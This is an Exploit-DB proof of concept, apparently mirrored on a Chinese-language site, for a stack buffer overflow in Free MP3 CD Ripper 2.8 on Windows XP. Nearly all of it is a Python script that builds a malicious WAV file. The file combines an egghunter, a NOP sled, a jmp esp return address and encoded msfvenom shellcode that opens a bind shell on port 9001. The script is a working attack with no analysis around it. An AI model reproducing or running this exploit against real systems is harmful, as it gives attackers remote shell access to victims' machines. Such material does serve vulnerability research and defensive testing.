Free MP3 CD Ripper 2.8 – Stack Buffer Overflow (SEH + Egghunter)

  • 作者: Eduard Palisek
    日期: 2020-07-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48696/
  • # Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
    # Date: 2020-07-22
    # Exploit Author: Eduard Palisek
    # Vendor Homepage: https://www.cleanersoft.com
    # Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
    # Version: 2.8 Build 20140611
    # Tested on: [Windows XP, Professional, Version 2002, SP 3
    #!/usr/bin/python
    file = open("exploit.wav", "wb")
    
    # msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind
    
    shellcode_bind =b""
    shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
    shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
    shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
    shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
    shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
    shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
    shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
    shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
    shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
    shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
    shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
    shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
    shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
    shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
    shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
    shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
    shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
    shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
    shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
    shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
    shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
    shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
    shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
    shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
    shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
    shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
    shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
    shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
    shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
    shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
    shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
    shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
    shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
    shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
    shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
    shellcode_bind += b"\xe8\xaa\x56\xc9\x38"
    
    egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    
    nops= "\x90" * 30
    junk1 = "A" * 2112
    tag = "W00TW00T"
    junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
    eip = "\x53\x93\x42\x7e" # 0x7e429353 : jmp esp in user32.dll
    
    buffer= junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter
    
    file.write(buffer)
    file.close()